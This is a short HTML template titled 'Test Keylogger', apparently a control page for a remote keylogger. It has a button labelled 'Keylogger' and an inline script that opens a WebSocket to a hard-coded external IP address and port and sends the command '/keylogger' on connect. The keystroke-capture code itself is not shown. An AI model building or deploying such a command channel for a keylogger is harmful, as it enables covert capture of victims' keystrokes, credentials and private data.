<!DOCTYPE html>
<html lang="en">

<head>
    {% block head %}
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test Keylogger</title>
    {% endblock head %}
</head>

<body>
    <form action="index.php" method="post">
        <button type="submit" name="keylogger" value="true">Keylogger</button>
    </form>
    <script>
        console.log("test");
        var conn = new WebSocket('wss://82.65.109.26:9003');
        conn.onopen = function (e) {
            console.log("Connection established!");
            conn.send("/keylogger\n");
        };
    </script>
</body>

</html>